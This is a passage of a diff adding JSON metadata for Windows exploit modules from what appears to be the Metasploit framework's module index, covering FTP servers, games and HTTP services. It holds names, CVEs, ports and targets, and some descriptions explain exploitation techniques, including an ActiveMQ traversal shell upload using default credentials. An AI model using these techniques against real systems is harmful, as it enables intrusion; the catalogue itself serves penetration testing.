"/modules/exploits/windows/ftp/turboftp_port.rb", + "is_install_path": true, + "ref_name": "windows/ftp/turboftp_port", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/vermillion_ftpd_port": { + "name": "Vermillion FTP Daemon PORT Command Memory Corruption", + "fullname": "exploit/windows/ftp/vermillion_ftpd_port", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-09-23", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits an out-of-bounds array access in the Arcane Software\n Vermillion FTP server. By sending a specially crafted FTP PORT command,\n an attacker can corrupt stack memory and execute arbitrary code.\n\n This particular issue is caused by processing data bound by attacker\n controlled input while writing into a 4 byte stack buffer. Unfortunately,\n the writing that occurs is not a simple byte copy.\n\n Processing is done using a source ptr (p) and a destination pointer (q).\n The vulnerable function walks the input string and continues while the\n source byte is non-null. If a comma is encountered, the function increments\n the destination pointer. If an ascii digit [0-9] is encountered, the\n following occurs:\n\n *q = (*q * 10) + (*p - '0');\n\n All other input characters are ignored in this loop.\n\n As a consequence, an attacker must craft input such that modifications\n to the current values on the stack result in usable values. In this exploit,\n the low two bytes of the return address are adjusted to point at the\n location of a 'call edi' instruction within the binary. This was chosen\n since 'edi' points at the source buffer when the function returns.\n\n NOTE: This server can be installed as a service using \"vftpd.exe install\".\n If so, the service does not restart automatically, giving an attacker only\n one attempt.", + "references": [ + "OSVDB-62163", + "EDB-11293" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic Targeting", + "vftpd 1.31 - Windows XP SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/vermillion_ftpd_port.rb", + "is_install_path": true, + "ref_name": "windows/ftp/vermillion_ftpd_port", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/warftpd_165_pass": { + "name": "War-FTPD 1.65 Password Overflow", + "fullname": "exploit/windows/ftp/warftpd_165_pass", + "aliases": [], + "rank": 200, + "disclosure_date": "1998-03-19", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This exploits the buffer overflow found in the PASS command\n in War-FTPD 1.65. This particular module will only work\n reliably against Windows 2000 targets. The server must be\n configured to allow anonymous logins for this exploit to\n succeed. A failed attempt will bring down the service\n completely.", + "references": [ + "CVE-1999-0256", + "OSVDB-875", + "BID-10078" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/warftpd_165_pass.rb", + "is_install_path": true, + "ref_name": "windows/ftp/warftpd_165_pass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/warftpd_165_user": { + "name": "War-FTPD 1.65 Username Overflow", + "fullname": "exploit/windows/ftp/warftpd_165_user", + "aliases": [], + "rank": 200, + "disclosure_date": "1998-03-19", + "type": "exploit", + "author": [ + "Fairuzan Roslan " + ], + "description": "This module exploits a buffer overflow found in the USER command\n of War-FTPD 1.65.", + "references": [ + "CVE-1999-0256", + "OSVDB-875", + "BID-10078" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic", + "Windows 2000 SP0-SP4 English", + "Windows XP SP0-SP1 English", + "Windows XP SP2 English", + "Windows XP SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/warftpd_165_user.rb", + "is_install_path": true, + "ref_name": "windows/ftp/warftpd_165_user", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/wftpd_size": { + "name": "Texas Imperial Software WFTPD 3.23 SIZE Overflow", + "fullname": "exploit/windows/ftp/wftpd_size", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-08-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in the SIZE verb in\n Texas Imperial's Software WFTPD 3.23.", + "references": [ + "CVE-2006-4318", + "OSVDB-28134", + "BID-19617" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows XP Pro SP1 English", + "Windows XP Pro SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/wftpd_size.rb", + "is_install_path": true, + "ref_name": "windows/ftp/wftpd_size", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/winaxe_server_ready": { + "name": "WinaXe 7.7 FTP Client Remote Buffer Overflow", + "fullname": "exploit/windows/ftp/winaxe_server_ready", + "aliases": [], + "rank": 400, + "disclosure_date": "2016-11-03", + "type": "exploit", + "author": [ + "Chris Higgins", + "hyp3rlix" + ], + "description": "This module exploits a buffer overflow in the WinaXe 7.7 FTP client.\n This issue is triggered when a client connects to the server and is\n expecting the Server Ready response.", + "references": [ + "EDB-40693", + "URL-http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/winaxe_server_ready.rb", + "is_install_path": true, + "ref_name": "windows/ftp/winaxe_server_ready", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/wing_ftp_admin_exec": { + "name": "Wing FTP Server Authenticated Command Execution", + "fullname": "exploit/windows/ftp/wing_ftp_admin_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-06-19", + "type": "exploit", + "author": [ + "Nicholas Nam ", + "Imran E. Dawoodjee " + ], + "description": "This module exploits the embedded Lua interpreter in the admin web interface for\n versions 3.0.0 and above. When supplying a specially crafted HTTP POST request\n an attacker can use os.execute() to execute arbitrary system commands on\n the target with SYSTEM privileges.", + "references": [ + "URL-http://www.wftpserver.com", + "URL-https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm" + ], + "platform": "Windows", + "arch": "x86", + "rport": 5466, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Wing FTP Server >= 3.0.0" + ], + "mod_time": "2021-02-17 12:33:59 +0000", + "path": "/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb", + "is_install_path": true, + "ref_name": "windows/ftp/wing_ftp_admin_exec", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/wsftp_server_503_mkd": { + "name": "WS-FTP Server 5.03 MKD Overflow", + "fullname": "exploit/windows/ftp/wsftp_server_503_mkd", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-11-29", + "type": "exploit", + "author": [ + "et ", + "Reed Arvin " + ], + "description": "This module exploits the buffer overflow found in the MKD\n command in IPSWITCH WS_FTP Server 5.03 discovered by Reed\n Arvin.", + "references": [ + "CVE-2004-1135", + "OSVDB-12509", + "BID-11772" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "WS-FTP Server 5.03 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb", + "is_install_path": true, + "ref_name": "windows/ftp/wsftp_server_503_mkd", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/wsftp_server_505_xmd5": { + "name": "Ipswitch WS_FTP Server 5.05 XMD5 Overflow", + "fullname": "exploit/windows/ftp/wsftp_server_505_xmd5", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-09-14", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in the XMD5 verb in\n IPSWITCH WS_FTP Server 5.05.", + "references": [ + "CVE-2006-4847", + "OSVDB-28939", + "BID-20076" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows XP Pro SP0 English", + "Windows XP Pro SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb", + "is_install_path": true, + "ref_name": "windows/ftp/wsftp_server_505_xmd5", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/xftp_client_pwd": { + "name": "Xftp FTP Client 3.0 PWD Remote Buffer Overflow", + "fullname": "exploit/windows/ftp/xftp_client_pwd", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-04-22", + "type": "exploit", + "author": [ + "zombiefx", + "dookie" + ], + "description": "This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered\n through an excessively long PWD message.", + "references": [ + "OSVDB-63968", + "EDB-12332" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/xftp_client_pwd.rb", + "is_install_path": true, + "ref_name": "windows/ftp/xftp_client_pwd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/xlink_client": { + "name": "Xlink FTP Client Buffer Overflow", + "fullname": "exploit/windows/ftp/xlink_client", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-10-03", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Xlink FTP Client 32\n Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2.\n When an overly long FTP server response is received by a client,\n arbitrary code may be executed.", + "references": [ + "CVE-2006-5792", + "OSVDB-33969", + "URL-http://www.xlink.com" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Pro SP3 English", + "Windows 2000 SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/xlink_client.rb", + "is_install_path": true, + "ref_name": "windows/ftp/xlink_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/xlink_server": { + "name": "Xlink FTP Server Buffer Overflow", + "fullname": "exploit/windows/ftp/xlink_server", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-10-03", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Xlink FTP Server\n that comes bundled with Omni-NFS Enterprise 5.2.\n When a overly long FTP request is sent to the server,\n arbitrary code may be executed.", + "references": [ + "CVE-2006-5792", + "OSVDB-58646", + "URL-http://www.xlink.com" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Omni-NFS Enterprise V5.2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/xlink_server.rb", + "is_install_path": true, + "ref_name": "windows/ftp/xlink_server", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/games/mohaa_getinfo": { + "name": "Medal of Honor Allied Assault getinfo Stack Buffer Overflow", + "fullname": "exploit/windows/games/mohaa_getinfo", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-07-17", + "type": "exploit", + "author": [ + "Jacopo Cervini" + ], + "description": "This module exploits a stack based buffer overflow in the getinfo\n command of Medal Of Honor Allied Assault.", + "references": [ + "CVE-2004-0735", + "OSVDB-8061", + "EDB-357", + "BID-10743" + ], + "platform": "Windows", + "arch": "", + "rport": 12203, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Medal Of Honor Allied Assault v 1.0 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/games/mohaa_getinfo.rb", + "is_install_path": true, + "ref_name": "windows/games/mohaa_getinfo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/games/racer_503beta5": { + "name": "Racer v0.5.3 Beta 5 Buffer Overflow", + "fullname": "exploit/windows/games/racer_503beta5", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-08-10", + "type": "exploit", + "author": [ + "Trancek " + ], + "description": "This module exploits the Racer Car and Racing Simulator game\n versions v0.5.3 beta 5 and earlier. Both the client and server listen\n on UDP port 26000. By sending an overly long buffer we are able to\n execute arbitrary code remotely.", + "references": [ + "CVE-2007-4370", + "OSVDB-39601", + "EDB-4283", + "BID-25297" + ], + "platform": "Windows", + "arch": "", + "rport": 26000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Fmodex.dll - Universal", + "Win XP SP2 English", + "Win XP SP2 Spanish" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/games/racer_503beta5.rb", + "is_install_path": true, + "ref_name": "windows/games/racer_503beta5", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/games/ut2004_secure": { + "name": "Unreal Tournament 2004 \"secure\" Overflow (Win32)", + "fullname": "exploit/windows/games/ut2004_secure", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-06-18", + "type": "exploit", + "author": [ + "stinko " + ], + "description": "This is an exploit for the GameSpy secure query in\n the Unreal Engine.\n\n This exploit only requires one UDP packet, which can\n be both spoofed and sent to a broadcast address.\n Usually, the GameSpy query server listens on port 7787,\n but you can manually specify the port as well.\n\n The RunServer.sh script will automatically restart the\n server upon a crash, giving us the ability to\n bruteforce the service and exploit it multiple\n times.", + "references": [ + "CVE-2004-0608", + "OSVDB-7217", + "BID-10570" + ], + "platform": "Windows", + "arch": "", + "rport": 7787, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "UT2004 Build 3186" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/games/ut2004_secure.rb", + "is_install_path": true, + "ref_name": "windows/games/ut2004_secure", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/adobe_robohelper_authbypass": { + "name": "Adobe RoboHelp Server 8 Arbitrary File Upload and Execute", + "fullname": "exploit/windows/http/adobe_robohelper_authbypass", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-09-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits an authentication bypass vulnerability which\n allows remote attackers to upload and execute arbitrary code.", + "references": [ + "CVE-2009-3068", + "OSVDB-57896", + "URL-http://www.intevydis.com/blog/?p=69", + "ZDI-09-066" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Universal Windows Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/adobe_robohelper_authbypass.rb", + "is_install_path": true, + "ref_name": "windows/http/adobe_robohelper_authbypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/advantech_iview_networkservlet_cmd_inject": { + "name": "Advantech iView NetworkServlet Command Injection", + "fullname": "exploit/windows/http/advantech_iview_networkservlet_cmd_inject", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-06-28", + "type": "exploit", + "author": [ + "rgod", + "y4er", + "Shelby Pace" + ], + "description": "Versions of Advantech iView software below `5.7.04.6469` are\n vulnerable to an unauthenticated command injection vulnerability\n via the `NetworkServlet` endpoint.\n The database backup functionality passes a user-controlled parameter,\n `backup_file` to the `mysqldump` command. The sanitization functionality only\n tests for SQL injection attempts and directory traversal, so leveraging the\n `-r` and `-w` `mysqldump` flags permits exploitation.\n The command injection vulnerability is used to write a payload on the target\n and achieve remote code execution as NT AUTHORITY\\SYSTEM.", + "references": [ + "URL-https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/", + "CVE-2022-2143" + ], + "platform": "Windows", + "arch": "x86, x64, cmd", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Dropper", + "Windows Command" + ], + "mod_time": "2022-08-09 16:12:54 +0000", + "path": "/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb", + "is_install_path": true, + "ref_name": "windows/http/advantech_iview_networkservlet_cmd_inject", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/advantech_iview_unauth_rce": { + "name": "Advantech iView Unauthenticated Remote Code Execution", + "fullname": "exploit/windows/http/advantech_iview_unauth_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-02-09", + "type": "exploit", + "author": [ + "wvu ", + "Spencer McIntyre" + ], + "description": "This module exploits an unauthenticated configuration change combined\n with an unauthenticated file write primitive, leading to an arbitrary\n file write that allows for remote code execution as the user running\n iView, which is typically NT AUTHORITY\\SYSTEM.\n\n This issue was demonstrated in the vulnerable version 5.7.02.5992 and\n fixed in version 5.7.03.6112.", + "references": [ + "CVE-2021-22652", + "URL-https://www.rapid7.com/blog/post/2021/02/11/cve-2021-22652-advantech-iview-missing-authentication-rce-fixed/", + "URL-https://us-cert.cisa.gov/ics/advisories/icsa-21-040-02" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/http/advantech_iview_unauth_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/advantech_iview_unauth_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/ajaxpro_deserialization_rce": { + "name": "AjaxPro Deserialization Remote Code Execution", + "fullname": "exploit/windows/http/ajaxpro_deserialization_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-12-03", + "type": "exploit", + "author": [ + "Hans-Martin Münch (MOGWAI LABS)", + "Jemmy Wang" + ], + "description": "This module leverages an insecure deserialization of data to get\n remote code execution on the target OS in the context of the user\n running the website which utilized AjaxPro.\n\n To achieve code execution, the module will construct some JSON data\n which will be sent to the target. This data will be deserialized by\n the AjaxPro JsonDeserializer and will trigger the execution of the\n payload.\n\n All AjaxPro versions prior to 21.10.30.1 are vulnerable to this\n issue, and a vulnerable method which can be used to trigger the\n deserialization exists in the default AjaxPro namespace.\n\n AjaxPro 21.10.30.1 removed the vulnerable method, but if a custom\n method that accepts a parameter of type that is assignable from\n `ObjectDataProvider` (e.g. `object`) exists, the vulnerability can\n still be exploited.\n\n This module has been tested successfully against official AjaxPro on\n version 7.7.31.1 without any modification, and on version 21.10.30.1\n with a custom vulnerable method added.", + "references": [ + "CVE-2021-23758", + "URL-https://mogwailabs.de/en/blog/2022/01/vulnerability-spotlight-rce-in-ajax.net-professional/" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper" + ], + "mod_time": "2023-11-03 00:04:20 +0000", + "path": "/modules/exploits/windows/http/ajaxpro_deserialization_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/ajaxpro_deserialization_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "screen-effects", + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/altn_securitygateway": { + "name": "Alt-N SecurityGateway username Buffer Overflow", + "fullname": "exploit/windows/http/altn_securitygateway", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-06-02", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "Alt-N SecurityGateway is prone to a buffer overflow condition. This\n is due to insufficient bounds checking on the \"username\"\n parameter. Successful exploitation could result in code\n execution with SYSTEM level privileges.\n\n NOTE: This service doesn't restart, you'll only get one shot. However,\n it often survives a successful exploitation attempt.", + "references": [ + "CVE-2008-4193", + "OSVDB-45854", + "BID-29457" + ], + "platform": "Windows", + "arch": "", + "rport": 4000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "SecurityGateway 1.0.1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/altn_securitygateway.rb", + "is_install_path": true, + "ref_name": "windows/http/altn_securitygateway", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/altn_webadmin": { + "name": "Alt-N WebAdmin USER Buffer Overflow", + "fullname": "exploit/windows/http/altn_webadmin", + "aliases": [], + "rank": 200, + "disclosure_date": "2003-06-24", + "type": "exploit", + "author": [ + "MC " + ], + "description": "Alt-N WebAdmin is prone to a buffer overflow condition. This\n is due to insufficient bounds checking on the USER\n parameter. Successful exploitation could result in code\n execution with SYSTEM level privileges.", + "references": [ + "CVE-2003-0471", + "OSVDB-2207", + "BID-8024", + "URL-http://www.nessus.org/plugins/index.php?view=single&id=11771" + ], + "platform": "Windows", + "arch": "", + "rport": 1000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "WebAdmin 2.0.4 Universal", + "WebAdmin 2.0.3 Universal", + "WebAdmin 2.0.2 Universal", + "WebAdmin 2.0.1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/altn_webadmin.rb", + "is_install_path": true, + "ref_name": "windows/http/altn_webadmin", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/amlibweb_webquerydll_app": { + "name": "Amlibweb NetOpacs webquery.dll Stack Buffer Overflow", + "fullname": "exploit/windows/http/amlibweb_webquerydll_app", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-08-03", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in Amlib's Amlibweb\n Library Management System (NetOpacs). The webquery.dll\n API is available through IIS requests. By specifying\n an overly long string to the 'app' parameter, SeH can be\n reliably overwritten allowing for arbitrary remote code execution.\n In addition, it is possible to overwrite EIP by specifying\n an arbitrary parameter name with an '=' terminator.", + "references": [ + "OSVDB-66814", + "BID-42293", + "URL-http://www.aushack.com/advisories/" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro All - English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/amlibweb_webquerydll_app.rb", + "is_install_path": true, + "ref_name": "windows/http/amlibweb_webquerydll_app", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/apache_activemq_traversal_upload": { + "name": "Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload", + "fullname": "exploit/windows/http/apache_activemq_traversal_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-08-19", + "type": "exploit", + "author": [ + "David Jorm", + "Erik Wynter" + ], + "description": "This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache\n ActiveMQ 5.x before 5.11.2 for Windows.\n\n The module tries to upload a JSP payload to the /admin directory via the traversal\n path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ\n credentials admin:admin (or other credentials provided by the user). It then issues\n an HTTP GET request to /admin/.jsp on the target in order to trigger the\n payload and obtain a shell.", + "references": [ + "CVE-2015-1830", + "EDB-40857", + "URL-https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 8161, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Java" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/apache_activemq_traversal_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/apache_activemq_traversal_upload", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/apache_chunked": { + "name": "Apache Win32 Chunked Encoding", + "fullname": "exploit/windows/http/apache_chunked", + "aliases": [], + "rank": 400, + "disclosure_date": "2002-06-19", + "type": "exploit", + "author": [ + "hdm ", + "jduck " + ], + "description": "This module exploits the chunked transfer integer wrap\n vulnerability in Apache version 1.2.x to 1.3.24. This\n particular module has been tested with all versions of the\n official Win32 build between 1.3.9 and 1.3.24. Additionally,\n it should work against most co-branded and bundled versions\n of Apache (Oracle 8i, 9i, IBM HTTPD, etc).\n\n You will need to use the Check() functionality to determine\n the exact target version prior to launching the exploit. The\n version of Apache bundled with Oracle 8.1.7 will not\n automatically restart, so if you use the wrong target value,\n the server will crash.", + "references": [ + "CVE-2002-0392", + "OSVDB-838", + "BID-5033" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Generic Bruteforce", + "Apache.org Build 1.3.9->1.3.19", + "Apache.org Build 1.3.22->1.3.24", + "Apache.org Build 1.3.19->1.3.24", + "Apache.org Build 1.3.22", + "Apache.org Build 1.3.17->1.3.24 (Windows 2000)", + "Apache.org Build 1.3.17->1.3.24 (Windows NT)", + "Windows 2003 English SP0", + "Windows 2000 English", + "Oracle 8.1.7 Apache 1.3.12", + "Oracle 9.1.0 Apache 1.3.12", + "Oracle 9.2.0 Apache 1.3.22", + "Debugging Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/apache_chunked.rb", + "is_install_path": true, + "ref_name": "windows/http/apache_chunked", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/apache_mod_rewrite_ldap": { + "name": "Apache Module mod_rewrite LDAP Protocol Buffer Overflow", + "fullname": "exploit/windows/http/apache_mod_rewrite_ldap", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-07-28", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits the mod_rewrite LDAP protocol scheme handling\n flaw discovered by Mark Dowd, which produces an off-by-one overflow.\n Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\n This module requires REWRITEPATH to be set accurately. In addition,\n the target must have 'RewriteEngine on' configured, with a specific\n 'RewriteRule' condition enabled to allow for exploitation.\n\n The flaw affects multiple platforms, however this module currently\n only supports Windows based installations.", + "references": [ + "CVE-2006-3747", + "OSVDB-27588", + "BID-19204", + "URL-http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html", + "EDB-3680", + "EDB-3996", + "EDB-2237" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb", + "is_install_path": true, + "ref_name": "windows/http/apache_mod_rewrite_ldap", + "check": true, + 